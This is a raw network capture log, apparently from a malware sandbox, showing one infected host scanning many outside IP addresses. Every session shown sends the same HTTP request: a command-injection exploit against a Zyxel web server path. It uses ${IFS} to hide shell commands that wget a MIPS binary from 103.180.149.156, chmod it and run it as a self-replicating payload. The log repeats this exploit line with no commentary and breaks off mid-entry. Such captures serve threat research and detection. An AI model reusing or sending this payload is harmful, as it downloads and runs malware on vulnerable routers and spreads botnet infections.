                                                        Feb 2, 2024 06:21:23.199750900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7587192.168.2.145496863.193.207.140443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.199799061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7588192.168.2.144187295.254.157.212443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.199851036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7589192.168.2.145480865.185.242.3443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.199877977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7590192.168.2.14428124.237.73.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.199918032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7591192.168.2.144068623.205.211.243443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.199954987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7592192.168.2.1448936212.160.225.141443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.199995041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7593192.168.2.146077694.12.132.42443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.200036049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7594192.168.2.1459880223.163.218.111443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.200088024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7595192.168.2.1444158147.226.243.218443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.200119972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7596192.168.2.144817692.95.179.42443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.200159073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7597192.168.2.1450554134.165.250.117443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.200196981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7598192.168.2.1436502143.78.31.43443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.200233936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7599192.168.2.144528224.144.144.140443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.200261116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7600192.168.2.145295839.226.141.54443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.200289011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7601192.168.2.143871269.74.63.137443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.200313091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7602192.168.2.144717264.100.143.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.200345039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7603192.168.2.143752295.249.219.28443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.200387955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7604192.168.2.143451095.104.60.157443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.200417042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7605192.168.2.1435038210.158.249.52443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.200448990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7606192.168.2.1447366150.37.14.209443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.200503111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7607192.168.2.144512259.153.45.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.200535059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7608192.168.2.143730258.8.237.140443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.200568914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7609192.168.2.1432962112.25.70.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.200632095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7610192.168.2.144630443.73.42.230443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.200669050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7611192.168.2.1459188157.21.136.159443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.200706005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7612192.168.2.145678836.174.225.73443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.200745106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7613192.168.2.145335612.239.23.47443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.200797081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7614192.168.2.143595091.225.41.240443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.200833082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7615192.168.2.144002634.60.127.90443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.200862885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7616192.168.2.143308224.212.247.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.200908899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7617192.168.2.1437472143.87.26.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.200965881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7618192.168.2.1441652194.72.41.74443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.201024055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7619192.168.2.1443766219.239.60.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.201061964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7620192.168.2.143498078.210.194.183443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.201102018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7621192.168.2.145856812.10.9.130443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.201155901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7622192.168.2.143781249.153.46.131443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.201184034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7623192.168.2.1433268119.73.3.78443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.201230049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7624192.168.2.143302839.102.102.58443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.201272011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7625192.168.2.1441942110.55.11.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.201311111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7626192.168.2.145052292.111.30.55443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.201378107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7627192.168.2.1445384133.77.97.96443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.201383114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7628192.168.2.145401617.214.73.163443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.201415062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7629192.168.2.1460132211.177.101.6443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.201442003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7630192.168.2.144032257.9.4.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.201527119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7631192.168.2.145558057.239.61.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.201556921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7632192.168.2.1436316182.37.217.31443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.201581001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7633192.168.2.143733260.116.200.251443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.201622963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7634192.168.2.144461045.230.121.206443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.201656103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7635192.168.2.145348051.191.176.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.201689959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7636192.168.2.1438874210.4.36.51443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.201735973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7637192.168.2.145091458.109.94.84443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.201781034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7638192.168.2.145658866.164.215.224443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.201802969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7639192.168.2.1444144116.63.120.140443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.201860905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7640192.168.2.1450780162.71.108.4443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.201894999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7641192.168.2.143944873.175.49.100443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.201909065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7642192.168.2.1442728167.75.173.184443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.201942921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7643192.168.2.143759845.129.103.168443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.201987982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7644192.168.2.1440992169.89.114.255443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.202014923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7645192.168.2.145921044.162.147.194443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.202052116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7646192.168.2.1458720211.45.113.136443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.202069998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7647192.168.2.1455400107.187.254.184443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.202121019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7648192.168.2.1439104137.67.201.62443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.202162027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7649192.168.2.1433804190.148.120.76443
                                                        TimestampBytes transferredDirectionData
